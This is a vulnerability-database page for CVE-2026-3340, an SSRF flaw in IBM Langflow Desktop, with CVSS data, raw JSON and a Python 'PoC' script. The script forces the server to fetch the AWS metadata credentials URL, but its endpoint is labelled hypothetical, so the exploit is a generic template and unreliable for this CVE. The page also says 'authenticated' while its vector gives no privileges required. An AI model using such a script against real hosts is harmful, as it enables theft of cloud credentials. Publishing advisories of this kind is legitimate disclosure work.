Security Vulnerability Report
CVE-2026-3340 CVSS 6.5 MEDIUM


Published: 2026-04-30 21:16:32
Last Modified: 2026-05-11 17:05:34

Description

IBM Langflow Desktop 1.0.0 through 1.8.4 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Weakness: CWE-918 (Server-Side Request Forgery)

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:* - VULNERABLE
IBM Langflow Desktop, versions 1.0.0 through 1.8.4 (both inclusive)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_ssrf(target_host, malicious_url):
    """
    Exploit SSRF vulnerability in IBM Langflow Desktop.

    This script sends a request to the target server forcing it to
    fetch the malicious_url.
    """
    # Hypothetical endpoint that triggers the vulnerability
    endpoint = f"{target_host}/api/v1/some-internal-fetch"

    # Payload containing the internal resource URL
    payload = {"url": malicious_url}

    try:
        print(f"[*] Sending payload to {endpoint}...")
        response = requests.post(endpoint, json=payload, timeout=10)

        if response.status_code == 200:
            print("[+] Request successful. Check response for internal data:")
            print(response.text)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] An error occurred: {e}")


if __name__ == "__main__":
    target = "http://127.0.0.1:5000"  # Replace with actual target
    # Example: attempting to access AWS metadata
    internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    exploit_ssrf(target, internal_target)
```

References

https://www.ibm.com/support/pages/node/7271096 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-3340",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-30T21:16:32.463",
    "lastModified": "2026-05-11T17:05:34.130",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "IBM Langflow Desktop 1.0.0 through 1.8.4 IBM Langflow is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-918" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.0.0",
                "versionEndIncluding": "1.8.4",
                "matchCriteriaId": "83CB6A3F-0146-4A7A-9FDF-7F49CCBBC143"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.ibm.com/support/pages/node/7271096",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```